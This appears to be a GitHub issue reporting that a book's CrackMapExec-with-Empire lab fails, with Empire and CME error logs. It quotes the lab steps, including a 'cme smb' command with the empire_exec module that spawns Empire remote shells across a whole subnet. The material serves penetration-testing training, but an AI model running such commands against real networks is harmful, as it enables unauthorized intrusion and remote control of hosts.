-
Notifications
You must be signed in to change notification settings - Fork 36
Open
Description
cme with empire lab isn't working !! the below error shown in empire terminal and noticed that no active listener was created after empire loading:
empire error:
(Empire) > 127.0.0.1 - - [13/Jun/2019 03:01:30] "POST /api/admin/login HTTP/1.1" 200 -
127.0.0.1 - - [13/Jun/2019 03:01:30] "POST /api/stagers?token=dbkcwd73wgud83lzf037uxtbyhfsbnv3ghvpwvwv HTTP/1.1" 400 -
(Empire) >
cme error:
[-] Error from empire : invalid listener ID or name
the lab from book:
Start Empire's REST API server
cd /opt/Empire
./empire --rest --password 'hacktheuniverse'
Change the CrackMapExec Password
gedit /root/.cme/cme.conf
password=hacktheuniverse
Run CME to spawn Empire shells
cme smb 10.100.100.0/24 -d 'cyberspacekittens.local' -u '' -p
'' -M empire_exec -o LISTENER=http
Metadata
Metadata
Assignees
Labels
No labels